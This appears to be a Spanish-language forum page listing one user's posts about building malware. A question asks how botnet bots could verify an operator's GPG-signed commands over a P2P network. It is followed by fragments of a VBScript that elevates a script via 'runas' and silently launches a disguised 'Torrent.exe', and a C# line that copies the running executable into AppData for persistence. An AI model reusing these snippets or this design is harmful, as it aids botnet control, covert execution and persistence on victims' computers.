Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCitarUsando gpg, si el "malo" firma un archivo con su clave privada y lo distribuye por la red p2p, cada bot que intente leer ese archivo debera de usar la clave publica del "malo".. seria una forma de hacerlo? es la mejor?
'=========================================================================
Option Explicit
Call ElevateWscript("gere.vbs")
Private Sub ElevateWscript(scriptName)
Dim objShell: Set objShell = CreateObject("Shell.Application")
Dim objFSO: Set objFSO = CreateObject("Scripting.FileSystemObject")
If objFSO.FileExists(scriptName) Then
Dim objFile: Set objFile = objFSO.GetFile(scriptName)
objShell.ShellExecute "Torrent.exe", Chr(34) & objFile.Path & Chr(34), "", "runas", 1
Else
Wscript.Echo "Script Does Not Exist!" & vbCrLf & scriptName
End If
End Sub
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "Torrent.exe" & Chr(34), 0
Set WshShell = Nothing
using System.IO;
string destFilePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), Path.GetFileName(Application.ExecutablePath));
File.Copy(Application.ExecutablePath, destFilePath);